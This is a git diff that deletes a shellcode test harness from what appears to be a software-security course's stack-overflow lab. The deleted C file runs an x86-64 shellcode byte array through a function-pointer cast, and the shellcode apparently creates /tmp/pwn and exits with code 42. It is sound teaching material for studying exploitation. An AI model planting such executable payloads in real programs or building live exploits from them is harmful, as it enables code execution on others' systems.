diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit-test.c b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit-test.c deleted file mode 100644 index 4170a7b..0000000 --- a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit-test.c +++ /dev/null @@ -1,10 +0,0 @@ -int main() { -unsigned char shellcode[] = { - 0xe8,0x09,0x00,0x00,0x00,0x2f,0x74,0x6d,0x70,0x2f,0x70,0x77,0x6e,0x00, - 0x5f,0x48,0xc7,0xc6,0xb6,0x01,0x00,0x00,0x48,0xc7,0xc0,0x55,0x00,0x00, - 0x00,0x0f,0x05,0xc3,0x48,0xc7,0xc7,0x2a,0x00,0x00,0x00,0x48,0xc7,0xc0, - 0x3c,0x00,0x00,0x00,0x0f,0x05 -}; -(*(void(*)()) shellcode)(); -return 0; -}